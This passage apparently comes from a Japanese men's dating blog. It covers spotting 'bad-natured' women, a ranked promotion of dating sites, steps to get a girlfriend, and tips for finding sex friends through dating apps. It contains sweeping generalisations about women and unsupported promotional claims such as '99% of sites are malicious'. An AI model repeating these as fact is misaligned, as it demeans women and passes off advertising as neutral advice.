また、口にはしていても言葉に気持ちがこもっていない女性も同様です。

やってもらって当たり前でしょ。」という考えを持っているため、人より感謝の気持ちが感じにくいのです。

まとめ

あなたの周りには、上の項目に該当する女性はいませんでしたか?

女性同士であれば、性格の悪い女性は見抜きやすいです。

しかし男性は騙されやすく、付き合ってみたら性格が悪い女性だったなんて経験がある人もいると思います。

それを防ぐためにも、今回ご紹介した性格が悪い女性を見抜く方法を参考にしてみてくださいね。

彼女作りに最適な出会い系サイトオススメ3選!

彼女を作りたいから出会い系サイトに登録を考えている男性は多いですが、何も考えずに出会い系サイトに登録するのは危険です。

高額な利用料金を請求される、個人情報を抜き取られたなど悪質な被害が出ているサイトは多いです。

今回は彼女作りに最適な出会い系サイトオススメ3選!を紹介したいと思います。

悪質出会い系サイトのパターン



出会い系サイトで悪徳と言われるパターンがあるので知っておき、気軽な気持ちでは利用しないでください。

ほとんどを占めるのが、迷惑メールで気を引き付け、無料アプリをダウンロード、悪質な出会い系サイトに登録させ、サクラしかいないのに高額な利用料金を請求されるパターンです。

最近は、迷惑メールだけでなく、LINE、Facebook、TwitterなどのSNSを使い、無料アプリへの誘導が多く、「無料」という言葉に惑わされ、個人情報を抜き取られる、高額なサイト料金を請求されるなど「無料アプリ」をダウンロードをしてしまうと大変な痛手を負うことになります。

99%が悪質な出会い系サイトだと言われているため、1%しかない安心安全の優良な出会い系サイトを利用することがベストです。

安心安全の出会い系サイトの基準

1.会社の創業から15年以上経っており、口コミでも実績評判がよい。

2.累積会員数が400万人以上いてアクセス数も多い。

3.年齢認証もきちんとしており、官庁への届け出もして法令を守っている

4.女性は利用料金が無料で男性でもメールの送信が50円以下である。

5.24時間365日、スタッフが電話で応対してくれており、サイト内を24時間監視している。

6.スマホ、パソコン、携帯電話、タブレットなどのほとんどのツールで利用ができる。

7.サイト内のメールを使用するため、個人のアドレス、携帯番号は非公開となっている。

8.メールアドレスや、LINEIDの交換は各自の自主性に任されている。

9.特定の相手をブロックできる機能もついている。

10.無料コンテンツが充実しており、ソーシャルネットワーク化されている。

安心安全の出会い系サイトは、広告費や紹介費に毎月数千万円使っています。

会社としてみると年間にして、数億円の支出になりますが、利用する側としては低価格のポイントで利用できるのは、多くの会員数がいるため利用料金が安くなっているのと、やはり安心安全であるから友人を通して口コミで広がっているのも一因であると言えます。

日本で1%しかない安心安全優良な出会い系サイトをランキングでご紹介します。

ランキング1位 ハッピーメール


お得なポイント制度

創業から20年が経過しており、累積登録数は1500万人、1日のログイン数も1日数百万アクセス、日本で一番の老舗出会い系サイトです。

携帯のメールアドレスで登録でき、1日に何度見てもプロフィール閲覧は無料でお得です。

男性は、新規登録時にお試しのサービスポイントが50ポイント付き、年齢認証すればさらに50サービスポイントが付き、メールアドレス登録でさらに20サービスポイントが付くため、なんと120サービスポイントがもらえます。

登録するだけで、1200円分無料という超お得なサイトで、1200円分無料というのはメール送信が5ポイントなので、24通分も無料になるのです!

また、定期的に返信メール3通分か無料のサービスチケットをメールで配信してくれるサービスもあります。

悪質な出会い系サイトによくある「無料だと思っていたら実は有料だった」というようなことは全くありませんし、架空請求のような犯罪行為もありません。

利用に必要なポイントも前払い制なので、お目当ての女の子が見つかってメールを送るのにポイントを使い過ぎて、スゴイ請求が来たなどの心配もありませんので、安心してください。

24時間365日電話・メールで安心サポート体制

深夜1や2時でもハッピーメールの使い方がわからないなどの、質問メールを送っても5分も待たずに自動返信メールではなく、きちんとした回答を送ってくれるので、利用者としては心強いです。

詐欺行為や他サイトへの勧誘行為への違反アカウントの削除体制も万全で、「女の子のメールアカウントが怪しい」と思ったら、24時間巡回しているため、すぐに怪しいアカウントは削除されますので、会員側としても被害に合わずに済みます。

個人情報流出の心配なし

ウイルス対策ソフトでNO1を誇るNorton社のNorton Secured Sealによってサイトの信頼性を強化しているため、サイトに登録したIDやパスワード、メールアドレスなどの個人情報が流出する恐れも無いため安心して登録、利用できます。

アプリにしかないメリット

ハッピーメールのアプリは使いずらいと言われてきたのですが、改良を重ね、今やストアの平均評価もiOSが4.0、Androidが3.9となっており、アプリの利用者も続々と増えてきています。

基本的な機能はwebもアプリも大して変わらないのですが、アプリにしかない機能もあるため是非ダウンロードしてみることをおススメします。

一つ目は1日1回ログインボーナスとして1ポイントもらえます。

「わずか1ポイントだけ?」と思う人もいるかもしれませんが、毎日ログインすれば1か月で30ポイントにもなるのです!

メールを5~6通も返信できるポイントなのでこれは見過ごせないサービス機能です。

2つ目は相手のプロフィール画像が無料で表示されます。

Web版ではプロフィール画像の閲覧にはポイントが必要になりますが、アプリでは無料で閲覧できるのです!

3つ目は課金の支払いが便利でキャリア決済ができることです。

ハッピーメールへの課金は、webマネーやクレジットカードの番号を入力、コンビニで支払いなど、手間がかかる部分もありました。

しかし、スマホアプリでは、課金の支払いをキャリア決済できるようになったため、キャリア決済の設定をしておくと画面上からポイントが購入できるようになるので、気軽に課金できます。

無料で使えるサービスが充実

ひとつのジャンル毎に1日1回無料で書き込みができるので、ジャンルを分けて書き込みすれば、1日数回女性に対してアピールできます。

ジャンルは、「全国メル友」「恋人募集」「友達募集」「今からあそぼ」などがありますので、いくつか毎日投稿すれば出会いも広がります。

また、日記の閲覧、書くこと、コメントが無料なので、自分の日記にコメントを書いてくれた女性にアピールできるし、反対に女性の日記にコメントを書いてアピールをするのも無料でできます。

業者に引っかからないコツ

24時間パトロールしており、業者のアカウントはすぐに削除されていますが、中には上手に業者が含まれている可能性もあるため、業者に引っかからないようにプロフィール検索を設定しましょう。

「興味あること」に「大人の交際」などアダルト系の項目を設定しないようにすること、使用端末はPC以外にすることがいいでしょう。

プロフィール写真がすごく可愛く、写真の画質も良い、ハートマークやスタンプで顔を隠している、胸や足のアップの場合は、業者の場合があります。

また、自己評価がすべて★5つになっているのは要注意です。

そういったことを除いていけば、あとは、「純粋に出会いを求めている女性」が残るので、その女性たちにメールを出していけば出会えます!

ランキング2位 PCMAX


新規登録時に最大100ポイント無料贈呈

創業17年という老舗であり、累積会員数が900万人以上おり、新規会員獲得に力を入れているため、毎日1000人以上新規登録する人がいます。

登録をすると50ポイントもらえ、年齢認証をすると50ポイント付くので、メールを送るのに5ポイント必要ですが、新規登録時には20通分無料でメールが送信できます。

出会い掲示板の充実

いろいろな出会いを求めて毎日10万件以上の書き込みがあり、掲示板は、出会うために欠かせない「出会いのメインコンテンツ」です。

昔からずっと使用されている機能ですが、現在も変わらず多くの男女に利用されています。

1度の掲示板の投稿だけで、日本全国、ジャンル問わず平均で50人以上の会員に閲覧されるため、非常に効率良く出会いを見つけることができます。

プロフィール検索で出会える確率増加

全ての項目を細かく回答すると女性からのメールの受信数、出会える確率も大きくなり、また、より突っ込んだ内容の質問に回答する「裏プロフィール」、バラエティー豊かな「100の質問」など豊富なラインナップで自己紹介、アピールすることができます。

プロフィール検索は、通常の検索に加え「裏プロフィール」などからも女性を検索できるため、興味のある質問や自分のこだわりの好みで女性を探せることができます。

ランキング3位 ペアーズ


業者が登録しにくい仕組み

利用にはFacebookのアカウントが必要なため業者が紛れ込む確率は低いため、真剣に女性との出会いを求める男性にとってはおススメです。

facebookには一切投稿されず、実際の友達にもわからないようになっているため安心です。

コミュニティ機能で相手を見つけやすい

創業してまだ6年という比較的新しい会社ですが、現在約20,000のコミュニティがあり、「イタリア料理好き」「海外旅行が好き」や、「趣味はカフェ巡り」「お米は固いのが好き」などの、自分の趣味や、好きなものをアピールするために利用されるため、自分と価値観が合う人を見つけやすくなっています。

まとめ

出会い系サイトは実際、悪質なところが多いため、利用には十分気を付ける必要があります。

登録しても大丈夫と思われる基準は、法令で決められた会社であること、24時間365日監視体制があるところ、永年営業しており老舗であることです。

全て満たしているのが、一番おススメの「ハッピーメール」なので、彼女を作りたいなら是非登録してみましょう。

【マネして!】彼女を作るための具体的な7つのステップ

一般的にも、彼女を作る過程や流れなどは人それぞれですが、周りはどのようにして彼女を作っているのかと気になる男性も多いのではないでしょうか。

彼女が上手くできない男性に多いのが、基本的なステップを踏んでいないことです。

今回は彼女を作るための具体的なステップを紹介しようと思います。

彼女を作る際の心構えと意識の関係



彼女を作ろうと考えたとき、「誰でもいいから彼女が欲しい」や「誘えばすぐにでも釣られてくれる子でいいか」といった飢えた感情は、焦りや急ぎの気持ちが自然と滲み出てしまうので、下心が丸出しになってしまうものですが、女性はそれを敏感に感じとることが出来てしまいます。

そのため、「彼女になってくれる相手なら、誰でもいいんじゃないかしら」と、悪い印象を与えてしまったり、避けられてしまう原因にもなってしまうのです。

時間がかかってもいいからと心に余裕を持つことで、視野も広がり気持ちも楽になります。

「急がば回れ」という言葉があるように、遠回りを意識することで、結果的に近道となることもあるのです。

彼女を作る際の基礎的なポイント

知り合いを増やす

女性との会話にある程度慣れる必要もあるので、まずは女性の知り合いから増やすことを目標にすると良いと思います。

具体的な方法としては、仕事の同僚や友人、飲み会や合コンに参加したり、ツイッターやインスタグラムといったSNSなどを利用することで、同じ趣味を持つ女性と知り合えたり、交友関係を深めるキッカケにもなります。

また、徐々に女性の知り合いを増やすことで、成り行きで会話をしていても、女性と話すことに少しずつ慣れることができ、女性に合わせた話題選びも出来るようになります。

したがって、彼女を作るためにはまず、女性に慣れることが第一歩なのです。

自分に合った女性を見つける



ある程度女性の知り合いが増えてくると、必ず自分に合う合わないといった相性の壁が現れることと思いますが、その中から自分に合った女性を一人に絞る必要があります。

彼女にするのは一人だと思うので、気になる女性や、同じ趣味を持った女性をターゲットとすると良いと思います。

お互いが同じ趣味や好みを持った同士だと、話題にも困ることがなく、友人同士の会話のような、スタンダードな話題から楽しむことが出来るからです。

会話を楽しむ

この人といると楽しい」と女性に思わせることが出来ると、好感を持たれ、最終的に「彼氏にしていいかも」と思ってもらえる確率が非常に上がります。

相手を楽しませるには、自分自身も楽しむ必要があるので、共通の話題や、生活に関することなど簡単な内容でもいいので、盛り上がりそうな話題を振ってみるといいでしょう。

まだ日が浅いうちは、恋愛に関する話題は出さず、相手が振ってきたら応えるというスタイルで居た方が、女性も安心感を覚えてくれます。

また、女性から恋愛の話題が出たときは、それだけお互いの友好関係が深まっていて、相手の女性もその手のことに興味があるのだと思ってもいいかもしれません。

清潔感を意識する



清潔な男性は当然、第一印象としても女性から好感を得ることが出来るので、日頃から意識することが必要ですが、清潔感というのは、意識しようと思ってから数日で身に付くものではないので、元々清潔さに関心を持っていなかった男性の場合、服装や髪型といった、身近な身のこなしから意識すると良いと思います。

また、女性と出かけるときやデートの時など、少し先のことを考えたとき、清潔さは自己アピールにも繋がるので、女性を遊びに誘うとき、または女性の方から誘われた時のための下準備は、きちんとしておくことが必要です。

自信を持つ

弱気な気持ちは自身を暗くしてしまうので、内気な雰囲気が出るようになってしまったり、声が小さくなる原因にもなります。

どうせ俺には彼女はできない」という自信の低下に繋がる諦めの気持ちでは、行動にして移すことも出来なくなり、女性の心を惹くことはできません。

したがって、前向きな気持ちを持ち、「俺ならできる」と挑戦する意思をもつことで、行動力にも繋がり、思いきった選択が出来るようになります。

前向きで明るく、自分の意思をきちんと持つ男性は女性を惹き付けることが出来るのです。

しかし注意しなければいけないのは、自信をもつことと、自意識過剰になることをイコールで繋げてしまってはいけないということです。

誰であっても彼女を作ることは可能である事実のもとで、「俺なら大丈夫」と自身を過小評価し過ぎず、諦めない気持ちは自信を持つためのものですが、「俺は格好いい」や「俺はイケメンだ」という自意識の高い気持ちは自信を持つということではなく、妄想を根拠なしに固定してしまう行為なので、充分に気を付けましょう。

女性に合わせた最終ステップ

食事やデートに誘う



ある程度仲良くなれたと感じるようになったときは、思いきって遊びや食事に誘ってみるといいかもしれません。

初めはデートという言葉は出さずに、スタンダードな誘いから始め、「○○って店の料理が凄い美味しいって評判だから、今度一緒に食べに行ってみない?」とあらかじめ調べておいたおすすめのお店の名前などを出して誘うことで、まだ友人関係であっても、食事や遊びに誘うことが出来ます。

このとき、日にちや時間を指定して聞くのではなく、相手の都合のいい日にちや時間を聞き出すことで、断られる確率を減らすことが出来ます。

気の聞いた誘いを心掛けるようにしましょう。

直接告白

最後のステップとして、告白をしなければ彼女を作ることはできませんが、告白をするとき、メールや電話を使った告白の仕方はおすすめできません。

なぜなら女性側が、「どうして直接顔を合わせて言ってくれないんだろう」と不思議に思ってしまうかもしれないからです。

例えば結婚を申し込むとき、電話やメールでプロポーズする男性はほとんど居ないと思います。

それと同様で、男性として、顔を見合わせた状態で告白をすることで、男らしさに女性は惹かれるのです

このとき、雰囲気作りにも重要な役割があります。

夜景を見ながら告白といったロマンチックな行為にも女性は魅力を感じやすく、雰囲気にも呑まれやすいので、告白するときは直接合い、遊び終えた夜にでも思いきって気持ちを伝えるといいかもしれません。

例外と選択



ツイッターやインスタグラムといったSNSでも、出会いは存在しますが、簡単に会うことの出来ないことが前提にある環境の場合は、リアルとは違い、例外として扱われます。

遠距離での恋愛は、リアルの恋愛とは環境が大きく異なるため、具体的なステップとして、これまで説明してきた上記とは違った道を歩むことになるかもしれませんが、知り合いを増やし選べる視野を広げ、そこから絞り込み、会えるまでの間、お互いで会話を楽しむという点においては同じことが言えます。

したがって、その場の選択によってそれぞれ異なった状況になることもあるので、自分のおかれている状況や環境をあらかじめ把握しておきましょう。

まとめ

順々にそったステップは、ゆっくりとした進行がほとんどであり、それほど丁寧に関係を築くからこそ、後悔のない結果になることも多いのです。

焦りだけに呑まれずに、本人も楽しめるような関係から築くことが、ごく自然で失敗のしにくい方法のひとつでもあるのです。

出会い系でセフレを作るために必須な4つの方法

「出会い系」であるのなら、簡単にセフレを作ることは出来るのではと思う男性もいるかもしれませんが、どうやってセフレを作ればいいのかと頭を悩ませてしまう男性は多いかと思います。

したがって、欠かせない必須のポイントというのがあります。

今回は出会い系でセフレを作るために必要なキーポイントについて紹介しようと思います。

セフレとその関係



セフレとは、セックス×フレンドの略した言葉であり、セックスフレンドとも言います。

恋人同士というわけではなく、肉体関係で結ばれた関係のことをいうので、リアルではなかなか持つことの出来ない関係かもしれませんが、ネット環境が盛んとなった現代には「出会い系」というのがあるので、セフレを作ることは誰であっても可能かもしれません。

しかし、「恋人」とは違った関係の難しさが存在するので、人選を誤ってしまったり、出会い系アプリやサイトの活用の仕方が上手くなければ、実際に会うことは愚か、思わぬことで関係が拗れてしまったり、関係が二日と保たない可能性もあります。

したがって、必要なのはセフレになる前の準備と、判断材料です。

出会い系と必須なキーポイント

出会い系アプリを厳選する

今ではありとあらゆる出会い系が広まっては、増えてきていますが、出会い系アプリやサイトは一つではないので厳選して選ぶ必要があります。

様々な出会い系アプリやサイトを利用している男性もいるかもしれませんが、それは効率がいいようで、あまりおすすめは出来ません。

なぜなら、アプリやサイトによってそれぞれ仕様やルールが違っているため、プロフィールや写真設定などに手間がかかってしまったり、挨拶の文章や女性相手の会話に、雑さが目立ってしまう可能性があるからです。

また、無料で全ての機能が使えるものもあれば、ポイント制であったり一部有料であるものもあり、管理にも手間がかかってしまうことがあります。

出会い系は同じ目的を持った女性が多数いるので、ツイッターやコミュニケーションを主としたチャットなど、出会い系とは異なったSNSよりも女性との出会いは豊富で多いのです。

黙っていても女性と出会えることもあるので、多数の出会い系を同時進行で利用していても、どこかで飽きが来てしまったり、手が回らないことになってしまいます。

したがって、出会い系アプリであっても、出会い系サイトであっても、利用するのなら一つに絞るか、二つでやりくりするかの二択にした方が、女性と初めにコミュニケーションをとる際にも楽かと思います。

どの出会い系にすればよいのか迷う場合の選び方としては、ネットの口コミや、女性利用者の多い出会い系アプリやサイトをピックアップし、プロフィール設定などに手間のかからない、スタンダードなところを選ぶといいと思います。

中には連絡先を交換することを禁止されているサイトやアプリもあるので、きちんと調べて利用規約を読むことを忘れないようにしましょう。

相手の性癖を把握する



女性とアプリやサイト内で出会うことに成功したとしても、セフレになるためには、相手の性癖を知ることが必要になってきます。

男性であっても女性であっても、第一印象である見た目を重視してしまう傾向にありますが、目的が恋人ではないので、高すぎる理想は持たずに、相手の女性がビッチで性欲が強いのかを第一に把握することが、セフレになることが出来るのかが予想できる、重要な鍵となります。

ビッチであるなら、相手もセフレを求めている可能性が高く、肉体関係を持つことに抵抗がないことはもちろん、セックスに経験がある場合があります。

性欲が強いことも同様に、相手の女性がセックスを好んでいることも把握することが出来る上に、セックスをする雰囲気に持ち込むことも難しくないので、セフレを作る時には見落としてはいけない部分です。

プロフィールは真剣に記入

出会い系を利用するにあたって、女性と話すことが出来るか、女性からのアプローチを受けることが出来るかは、ほぼプロフィールにかかっていると言えます。

顔写真すらのせられておらず、穴だらけのプロフィールを見ても、女性は関心を持つことはありません。

入れることの出来る項目は全て記入した方がいいかもしれませんが、その中でも必ず入れるべき項目は、アイコン、名前(またはニックネーム)、住んでいる地域、初めの一言挨拶、この4つです。

アイコンは自分を写す鏡のようなもので、何も設定のされていない男性から声がかかるのは、女性に余計な警戒心を抱かれてしまうので、雰囲気だけでもわかるような写真を設定するといいかもしれません。

匿名の出会い系もありますが、名前を設定する場合、本名で設定する男性は少ないかと思いますが、長すぎず、覚えてもらいやすい、簡単で他と被りそうにない名前にすると、女性の印象にも残りやすいと思います。

住んでいる地域は、会えるかどうかを女性にも知ってもらうために用いられる項目でもありますが、住んでいる地域が同じというだけでも、女性と会話する際の話題にもなるので、必ず記入しておきましょう。

そして、初めの一言挨拶とは、コメントという欄として記入する欄なのですが、そういった欄があった場合は、重苦しい文章ではなく、明るい文章を心がけることで、女性から声がかかる確率があがります。

ここで気を付けなければいけないのが、きちんと自身の目的を書くことです。

セフレ募集!」や「会える方は会いたいです!」など嘘偽りなく、自分が今求めている関係を書くことで、女性も読むことができ、同じ目的を持った女性から声がかかるかもしれません。

会話技術を磨く



出会い系で出会った方と実際に会ったことでトラブルになり、事件となってしまった例は少なくありません。

女性の場合、住んでいる地域も近く、会う意思があったとしても、それを行動として移すのが些か不安に感じることもあります。

そこで男性に求められるのは会話技術です。

セフレ募集に応えてくれた女性にたいして、「俺も真剣に会いたいんだ」という紳士な気持ちを相手の女性に伝える必要があるのです。

セフレといっても、顔を会わせるのは「初めて」であることを忘れずに、いきなり夜会うことを指定するのではなく、「セフレとしてよろしく」といった挨拶を含め、実際に会うときはきちんと曜日、明るいうちの時間指定をすることを心がけるようにすると、女性も安心感をもってくれます。

女性の安心感を初めに得ることで、セフレとして何度も会うことも可能になってくると思います。

必要なのは急いだ展開ではなく、順を追ったやり方なので、そこへスムーズに持ち込む会話技術が必要となります。

まとめ

プロフィールや記入内容をきちんと登録すること、相手のプロフィールにも目を配ることで、セフレはより早く、簡単に見つけることができます。

そこから実際に会うまでの基準を頭に入れ、出会い系アプリ、サイトの機能を利用して、丁寧な会話を持ち込むことで、誰でも簡単にセフレを作ることができるのです。